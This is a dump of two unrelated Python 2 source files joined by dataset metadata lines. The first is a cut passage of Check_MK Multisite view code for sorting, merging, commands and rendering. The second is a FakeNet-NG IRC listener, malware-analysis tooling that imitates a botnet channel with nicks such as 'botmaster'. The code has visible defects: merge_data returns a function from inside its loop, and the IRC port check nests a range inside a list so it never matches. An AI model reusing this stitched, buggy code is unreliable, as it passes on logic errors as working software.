rows = [ dict(zip(columns, row)) for row in data ]
return rows
# Merge all data rows with different sites but the same value
# in merge_column. We require that all column names are prefixed
# with the tablename. The column with the merge key is required
# to be the *second* column (right after the site column)
def merge_data(data, columns):
merged = {}
mergefuncs = [lambda a,b: ""] # site column is not merged
def worst_service_state(a, b):
if a == 2 or b == 2:
return 2
else:
return max(a, b)
def worst_host_state(a, b):
if a == 1 or b == 1:
return 1
else:
return max(a, b)
for c in columns:
tablename, col = c.split("_", 1)
if col.startswith("num_") or col.startswith("members"):
mergefunc = lambda a,b: a+b
elif col.startswith("worst_service"):
return worst_service_state
elif col.startswith("worst_host"):
return worst_host_state
else:
mergefunc = lambda a,b: a
mergefuncs.append(mergefunc)
for row in data:
mergekey = row[1]
if mergekey in merged:
oldrow = merged[mergekey]
merged[mergekey] = [ f(a,b) for f,a,b in zip(mergefuncs, oldrow, row) ]
else:
merged[mergekey] = row
# return all rows sorted according to merge key
mergekeys = merged.keys()
mergekeys.sort()
return [ merged[k] for k in mergekeys ]
# Sort data according to list of sorters. The tablename
# is needed in order to handle different column names
# for same objects (e.g. host_name in table services and
# simply name in table hosts)
def sort_data(data, sorters):
if len(sorters) == 0:
return
# Handle case where join columns are not present for all rows
def save_compare(compfunc, row1, row2, args):
if row1 == None and row2 == None:
return 0
elif row1 == None:
return -1
elif row2 == None:
return 1
else:
if args:
return compfunc(row1, row2, *args)
else:
return compfunc(row1, row2)
sort_cmps = []
for s in sorters:
cmpfunc = s[0]["cmp"]
negate = s[1] and -1 or 1
if len(s) > 2:
joinkey = s[2] # e.g. service description
else:
joinkey = None
sort_cmps.append((cmpfunc, negate, joinkey, s[0].get('args')))
def multisort(e1, e2):
for func, neg, joinkey, args in sort_cmps:
if joinkey: # Sorter for join column, use JOIN info
c = neg * save_compare(func, e1["JOIN"].get(joinkey), e2["JOIN"].get(joinkey), args)
else:
if args:
c = neg * func(e1, e2, *args)
else:
c = neg * func(e1, e2)
if c != 0: return c
return 0 # equal
data.sort(multisort)
# Filters a list of sorters or painters and decides which of
# those are available for a certain data source
def allowed_for_datasource(collection, datasourcename):
datasource = multisite_datasources[datasourcename]
infos_available = set(datasource["infos"])
add_columns = datasource.get("add_columns", [])
allowed = {}
for name, item in collection.items():
columns = get_painter_columns(item)
infos_needed = set([ c.split("_", 1)[0] for c in columns if c != "site" and c not in add_columns])
if len(infos_needed.difference(infos_available)) == 0:
allowed[name] = item
return allowed
def allowed_for_joined_datasource(collection, datasourcename):
if 'join' not in multisite_datasources[datasourcename]:
return {}
return allowed_for_datasource(collection, multisite_datasources[datasourcename]['join'][0])
def collist_of_collection(collection, join_target = []):
def sort_list(l):
# Sort the lists but don't mix them up
swapped = [ (disp, key) for key, disp in l ]
swapped.sort()
return [ (key, disp) for disp, key in swapped ]
if not join_target:
return sort_list([ (name, p["title"]) for name, p in collection.items() ])
else:
return sort_list([ (name, p["title"]) for name, p in collection.items() if (name, p["title"]) not in join_target ])
#.
# .--Commands------------------------------------------------------------.
# | ____ _ |
# | / ___|___ _ __ ___ _ __ ___ __ _ _ __ __| |___ |
# | | | / _ \| '_ ` _ \| '_ ` _ \ / _` | '_ \ / _` / __| |
# | | |__| (_) | | | | | | | | | | | (_| | | | | (_| \__ \ |
# | \____\___/|_| |_| |_|_| |_| |_|\__,_|_| |_|\__,_|___/ |
# | |
# +----------------------------------------------------------------------+
# | Functions dealing with external commands send to the monitoring |
# | core. The commands themselves are defined as a plugin. Shipped |
# | command definitions are in plugins/views/commands.py. |
# | We apologize for the fact that we one time speak of "commands" and |
# | the other time of "action". Both is the same here... |
# '----------------------------------------------------------------------'
# Checks wether or not this view handles commands for the current user
# When it does not handle commands the command tab, command form, row
# selection and processing commands is disabled.
def should_show_command_form(display_options, datasource):
if not 'C' in display_options:
return False
if not config.may("general.act"):
return False
if html.has_var("try"):
return False
# What commands are available depends on the Livestatus table we
# deal with. If a data source provides information about more
# than one table, (like services datasource also provide host
# information) then the first info is the primary table. So 'what'
# will be one of "host", "service", "command" or "downtime".
what = datasource["infos"][0]
for command in multisite_commands:
if what in command["tables"] and config.may(command["permission"]):
return True
return False
def show_command_form(is_open, datasource):
# What commands are available depends on the Livestatus table we
# deal with. If a data source provides information about more
# than one table, (like services datasource also provide host
# information) then the first info is the primary table. So 'what'
# will be one of "host", "service", "command" or "downtime".
what = datasource["infos"][0]
html.write('<div class="view_form" id="commands" %s>' %
(not is_open and 'style="display: none"' or '') )
html.begin_form("actions")
html.hidden_field("_do_actions", "yes")
html.hidden_field("actions", "yes")
html.hidden_fields() # set all current variables, exception action vars
# Show command forms, grouped by (optional) command group
by_group = {}
for command in multisite_commands:
if what in command["tables"] and config.may(command["permission"]):
# Some special commands can be shown on special views using this option.
# It is currently only used in custom views, not shipped with check_mk.
if command.get('only_view') and html.var('view_name') != command['only_view']:
continue
group = command.get("group", _("Various Commands"))
by_group.setdefault(group, []).append(command)
groups = by_group.keys()
groups.sort()
for group in groups:
forms.header(group, narrow=True)
for command in by_group[group]:
forms.section(command["title"])
command["render"]()
forms.end()
html.end_form()
html.write("</div>")
# Examine the current HTML variables in order determine, which
# command the user has selected. The fetch ids from a data row
# (host name, service description, downtime/commands id) and
# construct one or several core command lines and a descriptive
# title.
def core_command(what, row, row_nr, total_rows):
host = row.get("host_name")
descr = row.get("service_description")
if what == "host":
spec = host
cmdtag = "HOST"
elif what == "service":
spec = "%s;%s" % (host, descr)
cmdtag = "SVC"
else:
spec = row.get(what + "_id")
if descr:
cmdtag = "SVC"
else:
cmdtag = "HOST"
commands = None
title = None
# Call all command actions. The first one that detects
# itself to be executed (by examining the HTML variables)
# will return a command to execute and a title for the
# confirmation dialog.
for cmd in multisite_commands:
if config.may(cmd["permission"]):
# Does the command need information about the total number of rows
# and the number of the current row? Then specify that
if cmd.get("row_stats"):
result = cmd["action"](cmdtag, spec, row, row_nr, total_rows)
else:
result = cmd["action"](cmdtag, spec, row)
if result:
executor = cmd.get("executor", command_executor_livestatus)
commands, title = result
break
# Use the title attribute to determine if a command exists, since the list
# of commands might be empty (e.g. in case of "remove all downtimes" where)
# no downtime exists in a selection of rows.
if not title:
raise MKUserError(None, _("Sorry. This command is not implemented."))
# Some commands return lists of commands, others
# just return one basic command. Convert those
if type(commands) != list:
commands = [commands]
return commands, title, executor
def command_executor_livestatus(command, site):
html.live.command("[%d] %s" % (int(time.time()), command), site)
# make gettext localize some magic texts
_("services")
_("hosts")
_("commands")
_("downtimes")
_("aggregations")
# Returns:
# True -> Actions have been done
# False -> No actions done because now rows selected
# [...] new rows -> Rows actions (shall/have) be performed on
def do_actions(view, what, action_rows, backurl):
if not config.may("general.act"):
html.show_error(_("You are not allowed to perform actions. "
"If you think this is an error, please ask "
"your administrator grant you the permission to do so."))
return False # no actions done
if not action_rows:
message = _("No rows selected to perform actions for.")
if html.output_format == "html": # sorry for this hack
message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view'))
html.show_error(message)
return False # no actions done
command = None
title, executor = core_command(what, action_rows[0], 0, len(action_rows))[1:3] # just get the title and executor
if not html.confirm(_("Do you really want to %(title)s the following %(count)d %(what)s?") %
{ "title" : title, "count" : len(action_rows), "what" : visuals.infos[what]["title_plural"], }, method = 'GET'):
return False
count = 0
already_executed = set([])
for nr, row in enumerate(action_rows):
core_commands, title, executor = core_command(what, row, nr, len(action_rows))
for command_entry in core_commands:
site = row.get("site") # site is missing for BI rows (aggregations can spawn several sites)
if (site, command_entry) not in already_executed:
# Some command functions return the information about the site per-command (e.g. for BI)
if type(command_entry) == tuple:
site, command = command_entry
else:
command = command_entry
if type(command) == unicode:
command = command.encode("utf-8")
executor(command, site)
already_executed.add((site, command_entry))
count += 1
message = None
if command:
message = _("Successfully sent %d commands.") % count
if config.debug:
message += _("The last one was: <pre>%s</pre>") % command
elif count == 0:
message = _("No matching data row. No command sent.")
if message:
if html.output_format == "html": # sorry for this hack
message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view'))
if html.var("show_checkboxes") == "1":
html.del_var("selection")
weblib.selection_id()
backurl += "&selection=" + html.var("selection")
message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view with checkboxes reset'))
if html.var("_show_result") == "0":
html.immediate_browser_redirect(0.5, backurl)
html.message(message)
return True
def filter_by_row_id(view, rows):
wanted_row_id = html.var("_row_id")
for row in rows:
if row_id(view, row) == wanted_row_id:
return [row]
return []
def filter_selected_rows(view, rows, selected_ids):
action_rows = []
for row in rows:
if row_id(view, row) in selected_ids:
action_rows.append(row)
return action_rows
def get_context_link(user, viewname):
if viewname in available_views:
return "view.py?view_name=%s" % viewname
else:
return None
def ajax_export():
load_views()
for name, view in available_views.items():
view["owner"] = ''
view["public"] = True
html.write(pprint.pformat(available_views))
def get_view_by_name(view_name):
load_views()
return available_views[view_name]
#.
# .--Plugin Helpers------------------------------------------------------.
# | ____ _ _ _ _ _ |
# | | _ \| |_ _ __ _(_)_ __ | | | | ___| |_ __ ___ _ __ ___ |
# | | |_) | | | | |/ _` | | '_ \ | |_| |/ _ \ | '_ \ / _ \ '__/ __| |
# | | __/| | |_| | (_| | | | | | | _ | __/ | |_) | __/ | \__ \ |
# | |_| |_|\__,_|\__, |_|_| |_| |_| |_|\___|_| .__/ \___|_| |___/ |
# | |___/ |_| |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
def register_hook(hook, func):
if not hook in view_hooks:
view_hooks[hook] = []
if func not in view_hooks[hook]:
view_hooks[hook].append(func)
def execute_hooks(hook):
for hook_func in view_hooks.get(hook, []):
try:
hook_func()
except:
if config.debug:
raise MKGeneralException(_('Problem while executing hook function %s in hook %s: %s')
% (hook_func.__name__, hook, traceback.format_exc()))
else:
pass
def paint(p, row, tdattrs="", is_last_painter=False):
tdclass, content = prepare_paint(p, row)
if is_last_painter:
if tdclass == None:
tdclass = "last_col"
else:
tdclass += " last_col"
if tdclass:
html.write("<td %s class=\"%s\">%s</td>\n" % (tdattrs, tdclass, content))
else:
html.write("<td %s>%s</td>" % (tdattrs, content))
html.guitest_record_output("view", ("cell", content))
return content != ""
def paint_painter(painter, row):
if not row:
return "", "" # no join information available for that column
if "args" in painter:
return painter["paint"](row, *painter["args"])
else:
return painter["paint"](row)
def join_row(row, p):
join_key = len(p) >= 4 and p[3] or None
if join_key != None:
return row.get("JOIN", {}).get(join_key)
else:
return row
def prepare_paint(p, row):
painter = p[0]
linkview = p[1]
tooltip = len(p) > 2 and p[2] or None
row = join_row(row, p)
tdclass, content = paint_painter(painter, row)
if tdclass == None:
tdclass = ""
if tdclass == "" and content == "":
return tdclass, content
content = html.utf8_to_entities(content)
# Create contextlink to other view
if content and linkview:
content = link_to_view(content, row, linkview)
# Tooltip
if content != '' and tooltip:
cla, txt = multisite_painters[tooltip]["paint"](row)
tooltiptext = html.utf8_to_entities(html.strip_tags(txt))
content = '<span title="%s">%s</span>' % (tooltiptext, content)
return tdclass, content
def url_to_view(row, view_name):
if 'I' not in html.display_options:
return None
view = permitted_views().get(view_name)
if view:
# Get the context type of the view to link to, then get the parameters of this
# context type and try to construct the context from the data of the row
url_vars = []
datasource = multisite_datasources[view['datasource']]
for info_key in datasource['infos']:
if info_key in view['single_infos']:
# Determine which filters (their names) need to be set
# for specifying in order to select correct context for the
# target view.
for filter_name in visuals.info_params(info_key):
filter_object = visuals.get_filter(filter_name)
# Get the list of URI vars to be set for that filter
new_vars = filter_object.variable_settings(row)
url_vars += new_vars
# See get_link_filter_names() comment for details
for src_key, dst_key in visuals.get_link_filter_names(view, datasource['infos'],
datasource.get('link_filters', {})):
url_vars += visuals.get_filter(src_key).variable_settings(row)
url_vars += visuals.get_filter(dst_key).variable_settings(row)
# Some special handling for the site filter which is meant as optional hint
# Always add the site filter var when some useful information is available
add_site_hint = True
for filter_key in datasource.get('multiple_site_filters', []):
if filter_key in dict(url_vars):
add_site_hint = False
if add_site_hint and row.get('site'):
url_vars.append(('site', row['site']))
do = html.var("display_options")
if do:
url_vars.append(("display_options", do))
filename = html.mobile and "mobile_view.py" or "view.py"
return filename + "?" + html.urlencode_vars([("view_name", view_name)] + url_vars)
def link_to_view(content, row, view_name):
if 'I' not in html.display_options:
return content
url = url_to_view(row, view_name)
if url:
return "<a href=\"%s\">%s</a>" % (url, content)
else:
return content
def docu_link(topic, text):
return '<a href="%s" target="_blank">%s</a>' % (config.doculink_urlformat % topic, text)
# Calculates a uniq id for each data row which identifies the current
# row accross different page loadings.
def row_id(view, row):
key = ''
for col in multisite_datasources[view['datasource']]['idkeys']:
key += '~%s' % row[col]
return str(hash(key))
def paint_stalified(row, text):
if is_stale(row):
return "stale", text
else:
return "", text
def substract_sorters(base, remove):
for s in remove:
if s in base:
base.remove(s)
elif (s[0], not s[1]) in base:
base.remove((s[0], not s[1]))
def parse_url_sorters(sort):
sorters = []
if not sort:
return sorters
for s in sort.split(','):
if not '~' in s:
sorters.append((s.replace('-', ''), s.startswith('-')))
else:
sorter, join_index = s.split('~', 1)
sorters.append((sorter.replace('-', ''), sorter.startswith('-'), join_index))
return sorters
def get_sorter_name_of_painter(painter):
if 'sorter' in painter:
return painter['sorter']
elif painter['name'] in multisite_sorters:
return painter['name']
def get_primary_sorter_order(view, painter):
sorter_name = get_sorter_name_of_painter(painter)
this_asc_sorter = (sorter_name, False)
this_desc_sorter = (sorter_name, True)
group_sort, user_sort, view_sort = get_separated_sorters(view)
if user_sort and this_asc_sorter == user_sort[0]:
return 'asc'
elif user_sort and this_desc_sorter == user_sort[0]:
return 'desc'
else:
return ''
def get_separated_sorters(view):
group_sort = [ (get_sorter_name_of_painter(multisite_painters[p[0]]), False)
for p in view['group_painters']
if p[0] in multisite_painters
and get_sorter_name_of_painter(multisite_painters[p[0]]) is not None ]
view_sort = [ s for s in view['sorters'] if not s[0] in group_sort ]
# Get current url individual sorters. Parse the "sort" url parameter,
# then remove the group sorters. The left sorters must be the user
# individual sorters for this view.
# Then remove the user sorters from the view sorters
user_sort = parse_url_sorters(html.var('sort'))
substract_sorters(user_sort, group_sort)
substract_sorters(view_sort, user_sort)
return group_sort, user_sort, view_sort
def sort_url(view, painter, join_index):
"""
The following sorters need to be handled in this order:
1. group by sorter (needed in grouped views)
2. user defined sorters (url sorter)
3. configured view sorters
"""
sorter = []
group_sort, user_sort, view_sort = get_separated_sorters(view)
sorter = group_sort + user_sort + view_sort
# Now apply the sorter of the current column:
# - Negate/Disable when at first position
# - Move to the first position when already in sorters
# - Add in the front of the user sorters when not set
sorter_name = get_sorter_name_of_painter(painter)
if join_index:
this_asc_sorter = (sorter_name, False, join_index)
this_desc_sorter = (sorter_name, True, join_index)
else:
this_asc_sorter = (sorter_name, False)
this_desc_sorter = (sorter_name, True)
if user_sort and this_asc_sorter == user_sort[0]:
# Second click: Change from asc to desc order
sorter[sorter.index(this_asc_sorter)] = this_desc_sorter
elif user_sort and this_desc_sorter == user_sort[0]:
# Third click: Remove this sorter
sorter.remove(this_desc_sorter)
else:
# First click: add this sorter as primary user sorter
# Maybe the sorter is already in the user sorters or view sorters, remove it
for s in [ user_sort, view_sort ]:
if this_asc_sorter in s:
s.remove(this_asc_sorter)
if this_desc_sorter in s:
s.remove(this_desc_sorter)
# Now add the sorter as primary user sorter
sorter = group_sort + [this_asc_sorter] + user_sort + view_sort
p = []
for s in sorter:
if len(s) == 2:
p.append((s[1] and '-' or '') + s[0])
else:
p.append((s[1] and '-' or '') + s[0] + '~' + s[2])
return ','.join(p)
def paint_header(view, p, is_last_column_header=False):
# The variable p is a tuple with the following components:
# p[0] --> painter object, from multisite_painters[]
# p[1] --> view name to link to or None (not needed here)
# p[2] --> tooltip (title) to display (not needed here)
# p[3] --> optional: join key (e.g. service description)
# p[4] --> optional: column title to use instead default
painter = p[0]
join_index = None
t = painter.get("short", painter["title"])
if len(p) >= 4: # join column
join_index = p[3]
t = p[3] # use join index (service name) as title
if len(p) >= 5 and p[4]:
t = p[4] # use custom defined title
# Optional: Sort link in title cell
# Use explicit defined sorter or implicit the sorter with the painter name
# Important for links:
# - Add the display options (Keeping the same display options as current)
# - Link to _self (Always link to the current frame)
classes = []
onclick = ''
title = ''
if 'L' in html.display_options \
and view.get('user_sortable', False) \
and get_sorter_name_of_painter(painter) is not None:
params = [
('sort', sort_url(view, painter, join_index)),
]
if hasattr(html, 'title_display_options'):
params.append(('display_options', html.title_display_options))
classes += [ "sort", get_primary_sorter_order(view, painter) ]
onclick = ' onclick="location.href=\'%s\'"' % html.makeuri(params, 'sort')
title = ' title="%s"' % (_('Sort by %s') % t)
if is_last_column_header:
classes.append("last_col")
thclass = classes and (" class=\"%s\"" % " ".join(classes)) or ""
html.write("<th%s%s%s>%s</th>" % (thclass, onclick, title, t))
html.guitest_record_output("view", ("header", title))
def register_events(row):
if config.sounds != []:
host_state = row.get("host_hard_state", row.get("host_state"))
if host_state != None:
html.register_event({0:"up", 1:"down", 2:"unreachable"}[saveint(host_state)])
svc_state = row.get("service_last_hard_state", row.get("service_state"))
if svc_state != None:
html.register_event({0:"up", 1:"warning", 2:"critical", 3:"unknown"}[saveint(svc_state)])
# The Group-value of a row is used for deciding wether
# two rows are in the same group or not
def group_value(row, group_painters):
group = []
for p in group_painters:
groupvalfunc = p[0].get("groupby")
if groupvalfunc:
if "args" in p[0]:
group.append(groupvalfunc(row, *p[0]["args"]))
else:
group.append(groupvalfunc(row))
else:
for c in get_painter_columns(p[0]):
if c in row:
group.append(row[c])
return create_dict_key(group)
def create_dict_key(value):
if type(value) in (list, tuple):
return tuple(map(create_dict_key, value))
elif type(value) == dict:
return tuple([ (k, create_dict_key(v)) for (k, v) in sorted(value.items()) ])
else:
return value
def get_painter_option(name):
opt = multisite_painter_options[name]
if "forced_value" in opt:
return opt["forced_value"]
elif not config.may("general.painter_options"):
return opt['valuespec'].default_value()
else:
return opt.get("value", opt['valuespec'].default_value())
def get_host_tags(row):
if type(row.get("host_custom_variables")) == dict:
return row["host_custom_variables"].get("TAGS", "")
if type(row.get("host_custom_variable_names")) != list:
return ""
for name, val in zip(row["host_custom_variable_names"],
row["host_custom_variable_values"]):
if name == "TAGS":
return val
return ""
# Get the definition of a tag group
g_taggroups_by_id = {}
def get_tag_group(tgid):
# Build a cache
if not g_taggroups_by_id:
for entry in config.wato_host_tags:
g_taggroups_by_id[entry[0]] = (entry[1], entry[2])
return g_taggroups_by_id.get(tgid)
def get_custom_var(row, key):
for name, val in zip(row["custom_variable_names"],
row["custom_variable_values"]):
if name == key:
return val
return ""
def is_stale(row):
return row.get('service_staleness', row.get('host_staleness', 0)) >= config.staleness_threshold
def cmp_insensitive_string(v1, v2):
c = cmp(v1.lower(), v2.lower())
# force a strict order in case of equal spelling but different
# case!
if c == 0:
return cmp(v1, v2)
else:
return c
# Sorting
def cmp_ip_address(column, r1, r2):
def split_ip(ip):
try:
return tuple(int(part) for part in ip.split('.'))
except:
return ip
v1, v2 = split_ip(r1.get(column, '')), split_ip(r2.get(column, ''))
return cmp(v1, v2)
def cmp_simple_string(column, r1, r2):
v1, v2 = r1.get(column, ''), r2.get(column, '')
return cmp_insensitive_string(v1, v2)
def cmp_num_split(column, r1, r2):
c1 = r1[column]
c2 = r2[column]
return cmp(num_split(c1) + (c1,), num_split(c2) + (c2,))
def cmp_string_list(column, r1, r2):
v1 = ''.join(r1.get(column, []))
v2 = ''.join(r2.get(column, []))
return cmp_insensitive_string(v1, v2)
def cmp_simple_number(column, r1, r2):
return cmp(r1.get(column), r2.get(column))
def cmp_custom_variable(r1, r2, key, cmp_func):
return cmp(get_custom_var(r1, key), get_custom_var(r2, key))
def declare_simple_sorter(name, title, column, func):
multisite_sorters[name] = {
"title" : title,
"columns" : [ column ],
"cmp" : lambda r1, r2: func(column, r1, r2)
}
def declare_1to1_sorter(painter_name, func, col_num = 0, reverse = False):
multisite_sorters[painter_name] = {
"title" : multisite_painters[painter_name]['title'],
"columns" : multisite_painters[painter_name]['columns'],
}
if not reverse:
multisite_sorters[painter_name]["cmp"] = \
lambda r1, r2: func(multisite_painters[painter_name]['columns'][col_num], r1, r2)
else:
multisite_sorters[painter_name]["cmp"] = \
lambda r1, r2: func(multisite_painters[painter_name]['columns'][col_num], r2, r1)
return painter_name
# Ajax call for fetching parts of the tree
def ajax_inv_render_tree():
hostname = html.var("host")
invpath = html.var("path")
tree_id = html.var("treeid", "")
if tree_id:
tree = inventory.load_delta_tree(hostname, int(tree_id[1:]))
else:
tree = inventory.host(hostname)
node = inventory.get(tree, invpath)
if not node:
html.show_error(_("Invalid path %s in inventory tree") % invpath)
else:
render_inv_subtree_container(hostname, tree_id, invpath, node)
def output_csv_headers(view):
filename = '%s-%s.csv' % (view['name'], time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))
if type(filename) == unicode:
filename = filename.encode("utf-8")
html.req.headers_out['Content-Disposition'] = 'Attachment; filename=%s' % filename
#.
# .--Icon Selector-------------------------------------------------------.
# | ___ ____ _ _ |
# | |_ _|___ ___ _ __ / ___| ___| | ___ ___| |_ ___ _ __ |
# | | |/ __/ _ \| '_ \ \___ \ / _ \ |/ _ \/ __| __/ _ \| '__| |
# | | | (_| (_) | | | | ___) | __/ | __/ (__| || (_) | | |
# | |___\___\___/|_| |_| |____/ \___|_|\___|\___|\__\___/|_| |
# | |
# +----------------------------------------------------------------------+
# | AJAX API call for rendering the icon selector |
# '----------------------------------------------------------------------'
def ajax_popup_icon_selector():
varprefix = html.var('varprefix')
value = html.var('value')
allow_empty = html.var('allow_empty') == '1'
vs = IconSelector(allow_empty=allow_empty)
vs.render_popup_input(varprefix, value)
#.
# .--Action Menu---------------------------------------------------------.
# | _ _ _ __ __ |
# | / \ ___| |_(_) ___ _ __ | \/ | ___ _ __ _ _ |
# | / _ \ / __| __| |/ _ \| '_ \ | |\/| |/ _ \ '_ \| | | | |
# | / ___ \ (__| |_| | (_) | | | | | | | | __/ | | | |_| | |
# | /_/ \_\___|\__|_|\___/|_| |_| |_| |_|\___|_| |_|\__,_| |
# | |
# +----------------------------------------------------------------------+
# | Realizes the popup action menu for hosts/services in views |
# '----------------------------------------------------------------------'
def query_action_data(what, host, site, svcdesc):
# Now fetch the needed data from livestatus
columns = list(iconpainter_columns(what, toplevel=False))
try:
columns.remove('site')
except KeyError:
pass
if site:
html.live.set_only_sites([site])
html.live.set_prepend_site(True)
query = 'GET %ss\n' \
'Columns: %s\n' \
'Filter: host_name = %s\n' \
% (what, ' '.join(columns), host)
if what == 'service':
query += 'Filter: service_description = %s\n' % svcdesc
row = html.live.query_row(query)
html.live.set_prepend_site(False)
html.live.set_only_sites(None)
return dict(zip(['site'] + columns, row))
def ajax_popup_action_menu():
site = html.var('site')
host = html.var('host')
svcdesc = html.var('service')
what = svcdesc and 'service' or 'host'
prepare_display_options()
row = query_action_data(what, host, site, svcdesc)
icons = get_icons(what, row, toplevel=False)
html.write('<ul>\n')
for icon in icons:
html.write('<li>\n')
if len(icon) == 4:
icon_name, title, url_spec = icon[1:]
if url_spec:
url, target_frame = sanitize_action_url(url_spec)
url = replace_action_url_macros(url, what, row)
onclick = ''
if url.startswith('onclick:'):
onclick = ' onclick="%s"' % url[8:]
url = 'javascript:void(0)'
target = ""
if target_frame and target_frame != "_self":
target = " target=\"%s\"" % target_frame
html.write('<a href="%s"%s%s>' % (url, target, onclick))
html.icon('', icon_name)
if title:
html.write(title)
else:
html.write(_("No title"))
if url_spec:
html.write('</a>')
else:
html.write(icon[1])
html.write('</li>\n')
html.write('</ul>\n')
def sanitize_action_url(url_spec):
if type(url_spec) == tuple:
return url_spec
else:
return (url_spec, None)
| 1.453125 | 1 |
fakenet/listeners/IRCListener.py | kak-bo-che/flare-fakenet-ng | 1 | 12766393 | <reponame>kak-bo-che/flare-fakenet-ng
import logging
import sys
import os
import threading
import SocketServer
import ssl
import socket
import BannerFactory
from . import *
RPL_WELCOME = '001'
SRV_WELCOME = "Welcome to FakeNet."
BANNERS = {
'generic': 'Welcome to IRC - {servername} - %a %b %d %H:%M:%S {tz} %Y',
'debian-ircd-irc2': (
'17/10/2011 11:50\n' +
' [ Debian GNU/Linux ]\n' +
'|------------------------------------------------------------------------|\n' +
'| This is Debian\'s default IRCd server configuration for irc2.11. If you |\n' +
'| see this and if you are the server administrator, just edit ircd.conf |\n' +
'| and ircd.motd in /etc/ircd. |\n' +
'| <NAME>, 1st January 2005 |\n' +
'|------------------------------------------------------------------------|\n')
}
class IRCListener(object):
def taste(self, data, dport):
# All possible commands are included to account for unanticipated
# malware behavior
commands = [
'ADMIN', 'AWAY', 'CAP', 'CNOTICE', 'CPRIVMSG', 'CONNECT', 'DIE',
'ENCAP', 'ERROR', 'HELP', 'INFO', 'INVITE', 'ISON', 'JOIN', 'KICK',
'KILL', 'KNOCK', 'LINKS', 'LIST', 'LUSERS', 'MODE', 'MOTD',
'NAMES', 'NAMESX', 'NICK', 'NOTICE', 'OPER', 'PART', 'PASS',
'PING', 'PONG', 'PRIVMSG', 'QUIT', 'REHASH', 'RESTART', 'RULES',
'SERVER', 'SERVICE', 'SERVLIST', 'SQUERY', 'SQUIT', 'SETNAME',
'SILENCE', 'STATS', 'SUMMON', 'TIME', 'TOPIC', 'TRACE', 'UHNAMES',
'USER', 'USERHOST', 'USERIP', 'USERS', 'VERSION', 'WALLOPS',
'WATCH', 'WHO', 'WHOIS', 'WHOWAS'
]
# ubuntu xchat uses 8001
ports = [194, 6667, range(6660, 7001), 8001]
confidence = 1 if dport in ports else 0
data = data.lstrip()
# remove optional prefix
if data.startswith(':'):
data = data.split(' ')[0]
for command in commands:
if data.startswith(command):
confidence += 2
continue
return confidence
def __init__(self,
config,
name='IRCListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'IRC'
self.port = self.config.get('port', 6667)
self.logger.debug('PORT: %s', self.port)
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
self.banner = self.genBanner()
self.server.listener = self
self.server.logger = self.logger
self.server.config = self.config
self.server.servername = self.config.get('servername', 'localhost')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.info('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
def genBanner(self):
bannerfactory = BannerFactory.BannerFactory()
return bannerfactory.genBanner(self.config, BANNERS)
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 10)))
self.server.logger.info('Client connected')
try:
while True:
data = self.request.recv(1024)
if not data:
break
elif len(data) > 0:
for line in data.split("\n"):
if line and len(line) > 0:
if ' ' in line:
cmd, params = line.split(' ', 1)
else:
cmd, params = line, ''
handler = getattr(self, 'irc_%s' % (cmd.upper()), self.irc_DEFAULT)
handler(cmd, params)
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
def irc_DEFAULT(self, cmd, params):
self.server.logger.info('Client issued an unknown command %s %s', cmd, params)
self.irc_send_server("421", "%s :Unknown command" % cmd)
def irc_NICK(self, cmd, params):
self.nick = params
banner = self.server.listener.banner
self.irc_send_server("001", "%s :%s" % (self.nick, banner))
self.irc_send_server("376", "%s :End of /MOTD command." % self.nick)
def irc_USER(self, cmd, params):
if params.count(' ') == 3:
user, mode, unused, realname = params.split(' ', 3)
self.user = user
self.mode = mode
self.realname = realname
self.request.sendall('')
def irc_PING(self, cmd, params):
self.request.sendall(":%s PONG :%s" % (self.server.servername, self.server.servername))
def irc_JOIN(self, cmd, params):
if ' ' in params:
channel_names, channel_keys = params.split(' ')
else:
channel_names = params
channel_keys = None
for i, channel_name in enumerate(channel_names.split(',')):
if channel_keys:
self.server.logger.info('Client %s is joining channel %s with key %s', self.nick, channel_name, channel_keys.split(',')[i])
else:
self.server.logger.info('Client %s is joining channel %s with no key', self.nick, channel_name)
self.request.sendall(":root TOPIC %s :FakeNet\r\n" % channel_name)
self.irc_send_client("JOIN :%s" % channel_name)
nicks = ['botmaster', 'bot', 'admin', 'root', 'master']
self.irc_send_server("353", "%s = %s :%s" % (self.nick, channel_name, ' '.join(nicks)))
self.irc_send_server("366", "%s %s :End of /NAMES list" % (self.nick, channel_name))
# Send a welcome message
self.irc_send_client_custom('botmaster', 'botmaster', self.server.servername, "PRIVMSG %s %s" % (channel_name, "Welcome to the channel! %s" % self.nick))
def irc_PRIVMSG(self, cmd, params):
if ' ' in params:
target, message = params.split(' ', 1)
self.server.logger.info('Client sent message "%s" to %s', message, target)
# Echo the message in the channel back to the user
if target[0] in ['#', '$']:
self.irc_send_client_custom('botmaster', 'botmaster', self.server.servername, "PRIVMSG %s %s" % (target, message))
# Echo the private message back to the user
else:
self.irc_send_client_custom(target, target, self.server.servername, "PRIVMSG %s %s" % (self.nick, message))
def irc_NOTICE(self, cmd, params):
pass
def irc_PART(self, cmd, params):
pass
def irc_send_server(self, code, message):
self.request.sendall(":%s %s %s\r\n" % (self.server.servername, code, message))
def irc_send_client(self, message):
self.irc_send_client_custom(self.nick, self.user, self.server.servername, message)
def irc_send_client_custom(self, nick, user, servername, message):
self.request.sendall(":%s!%s@%s %s\r\n" % (nick, user, servername, message))
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Avoid [Errno 98] Address already in use due to TIME_WAIT status on TCP
# sockets, for details see:
